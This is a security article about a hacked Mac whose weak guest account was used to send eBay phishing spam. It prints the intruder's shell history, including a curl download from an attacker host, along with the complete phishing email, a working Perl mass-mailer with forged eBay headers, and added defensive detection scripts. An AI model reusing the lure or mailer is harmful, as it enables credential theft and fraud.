Rixstep

Phishing Tales Can Come True

It can happen to you.


1. MacInTouch Notes and Tips

Dave Villeneuve sent the most instructive email we've seen in a long time.

Much to my horror, I awoke on the weekend to an e-mail from my service provider which started with:


'Recently we have had complaints of spam coming from your connection.'

My wife had complained last week that the computer at home had seemed a bit slow. I rebooted it, and it seemed fine immediately afterwards.

Now I took immediate action, sent an email indicating it was unintentional and I'd take care of it immediately. I pulled the network cable and proceeded to see what had happened.

In a nutshell, about a year ago I'd played around with fast user switching. I'd created an account with the userid of 'lisa' and a password of 'lisa'. Ok, not too swift, but it was convenient for a test. I'd forgotten about it. When I looked in the account's .bash_history file, I found stuff like:


curl -O haq.sytes.net/sex.zip
ls
unzip sex.zip
rm -rf sex.zip
cd sex
ls
pico users
chmod +x sendeb.pl
./sendeb.pl
passwd

So clearly the person had logged into this not secure, yet still non-admin account and was running scripts. Likely they had gotten in via ssh, since I had the port open so I could do remote maintenance from my office if the need arose.

Checking the /var/log/mail.log (one of the archives), I found that on October 30th it had sent out over 500,000 eBay spam messages.

Just a warning... Make sure you use secure/difficult-to-guess passwords, i.e. don't use 'guest guest', or name name userid/password pairs.

Mac OS X is very secure, but not if you leave the doors unlocked and the keys in the ignition.
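
The .bash_history lines in the email follow a recognisable order: a remote fetch, an execute bit set on something from that fetch, then the file being run. The following triage script is an added example, not part of the original email or of Rixstep's page; the function names are hypothetical, and the only input is the ten history lines quoted above.

```python
import shlex

FETCHERS = {"curl", "wget"}

# The ten .bash_history lines quoted in the email above.
HISTORY = """curl -O haq.sytes.net/sex.zip
ls
unzip sex.zip
rm -rf sex.zip
cd sex
ls
pico users
chmod +x sendeb.pl
./sendeb.pl
passwd""".splitlines()

def adds_exec(mode):
    """True for chmod modes that set an execute bit (+x, u+x, 755, ...)."""
    if mode.isdecimal():
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode.split("+", 1)[1]

def triage_history(lines):
    """Return (line_no, reason) for each step of a fetch -> chmod +x -> run chain."""
    findings, fetched, made_exec = [], False, set()
    for no, raw in enumerate(lines, 1):
        try:
            argv = shlex.split(raw)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            argv = raw.split()
        if not argv:
            continue
        base = argv[0].rsplit("/", 1)[-1]
        if base in FETCHERS:
            fetched = True
            urls = [a for a in argv[1:] if not a.startswith("-")]
            findings.append((no, "remote fetch: " + " ".join(urls)))
        elif base == "chmod" and len(argv) > 2 and adds_exec(argv[1]) and fetched:
            made_exec.update(f.rsplit("/", 1)[-1] for f in argv[2:])
            findings.append((no, "execute bit set after a download: " + " ".join(argv[2:])))
        elif "/" in argv[0] and base in made_exec:
            findings.append((no, "ran freshly downloaded file: " + argv[0]))
        elif base == "passwd":
            findings.append((no, "account password changed in this session"))
    return findings
```

The history file is writable by the very account that was taken over, so an empty result from a check like this says nothing about whether the account is clean.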

2. msg.txt

eBay request: Please follow the Member Verification Procedure (Second Notice)

Dear eBay Member,

Due to recent account takeovers and unauthorized listings, eBay is introducing a new account verification method. From time to time, randomly selected accounts (seller and/or buyer) are subjected to an advanced verification process based on our merchant accounts/bank relations and customers credit card. eBay may also request in an email message scanned/faxed copies of one or more photo ID's. Your account confirmation may go wrong if your credit card/bank account is expired, or if you have changed your credit card number, billing address etc. without letting us know about the change.
Subject of this verification process are also the accounts that have unpaid dues to eBay.
Your account is not suspended, but if in 48 hours after you receive this message your account is not confirmed we reserve the right to suspend your eBay registration. If you received this notice and you are not the authorized account holder, please be aware that it is in violation of eBay policy to represent oneself as another eBay user. Such action may also be in violation of local, national, and/or international law. eBay is committed to assist law enforcement with any inquires related to attempts to misappropriate personal information with the intent to commit fraud or theft. Information will be provided at the request of law enforcement agencies to ensure that perpetrators are prosecuted to the full extent of the law.

Note: If this is the second time you receive this notice, it might be because you have made a mistake when you entered your details or that the account was not updated at all.


To confirm your identity with us click here:
http://signin.ebay.com/aw-cgi/eBayISAPI.dll?userconfirm&ssPageName=h:h:sin:US

We apologize in advance for any inconvenience this may cause you and we would like to thank you for your cooperation as we review this matter.



Respectfully,
Trust and Safety Department
eBay Inc.

http://www.ebay.com/


This eBay notice was sent to you based on your eBay account preferences. If you would like to review your notification preferences for other types of communications, click here. If you would like to receive this email in text only, click here.

As outlined in our User Agreement, eBay will periodically send you information about site changes and enhancements. Visit our Privacy Policy and User Agreement if you have any questions.

Copyright © 2005 eBay Inc. All Rights Reserved.
Designated trademarks and brands are the property of their respective owners.

eBay and the eBay logo are trademarks of eBay Inc.f

3. sendeb.pl

#!/usr/bin/perl

$SUBJ="IMPORTANT:Security Issues [Incident: 040921]";
$MSG="msg.txt";
$USERS="users";

open(IN,$USERS);

$id=12345;
while(chop($line=<IN>)){
open(SM,"|/usr/sbin/sendmail $line");
print(SM "To: $line\n");
print(SM "Subject: $SUBJ\n");
print(SM "Message-ID: <".time().".$id.qmail\@bankofamerica.com>\n");
print(SM "From: \"eBay Security Dept.\" <security\@ebay.com>\n");
print("Message sent to $line\n");
print(SM "Content-Type: text/html\n");
open(FILE,$MSG);
while($line=<FILE>){
    print(SM $line);
}
close(FILE);
close(SM);
$id++;
}

close(IN);
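
The headers this script writes contradict each other: the From address is at ebay.com, the Message-ID is stamped bankofamerica.com, and a Content-Type is sent with no MIME-Version. The following check for a receiving-side filter is an added example, not code from the original page; the function names are hypothetical, and the sample message is constructed from the script's header lines with a made-up recipient, timestamp and body.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the headers sendeb.pl writes, with a made-up recipient
# and timestamp; the body is a stand-in for msg.txt.
SAMPLE = (
    "To: user@example.org\n"
    "Subject: IMPORTANT:Security Issues [Incident: 040921]\n"
    "Message-ID: <1130650000.12345.qmail@bankofamerica.com>\n"
    'From: "eBay Security Dept." <security@ebay.com>\n'
    "Content-Type: text/html\n"
    "\n"
    "<html><body>Dear eBay Member, ...</body></html>\n"
)

def host_of(addr):
    """Host part of an addr-spec or msg-id, or '' when there is no '@'."""
    return addr.rpartition("@")[2].lower() if "@" in addr else ""

def org_domain(host):
    """Naive organisational domain: last two labels (assumption: no public-suffix list)."""
    return ".".join(host.rstrip(".").split(".")[-2:])

def header_indicators(raw):
    """Return header inconsistencies to feed into a filter's score."""
    msg = message_from_string(raw)
    hits = []
    from_host = host_of(parseaddr(msg.get("From", ""))[1])
    mid_host = host_of(msg.get("Message-ID", "").strip().strip("<>"))
    if from_host and mid_host and org_domain(from_host) != org_domain(mid_host):
        hits.append(f"Message-ID domain {mid_host} does not match From domain {from_host}")
    if msg.get("Content-Type") and not msg.get("MIME-Version"):
        hits.append("Content-Type present without MIME-Version")
    return hits
```

Legitimate bulk senders also produce Message-IDs under a different domain from the From address, so treat these as scoring signals rather than a verdict.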

4. users

cleo_nav@yahoo.com

Copyright © Rixstep. All rights reserved.